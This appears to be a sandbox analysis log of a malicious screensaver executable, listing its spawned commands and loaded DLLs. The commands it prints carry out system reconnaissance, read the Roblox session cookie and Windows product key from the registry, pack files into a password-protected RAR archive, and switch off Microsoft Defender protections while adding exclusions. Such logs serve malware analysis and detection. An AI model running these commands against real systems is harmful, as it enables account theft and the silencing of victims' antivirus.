Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: python3.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: libffi-8.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: sqlite3.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: libcrypto-3.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: libssl-3.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: avicap32.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: msvfw32.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: dciman32.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: winmmbase.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: mmdevapi.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: devobj.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: ksuser.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: avrt.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: audioses.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: umpdc.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: msacm32.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: midimap.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\tree.com Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
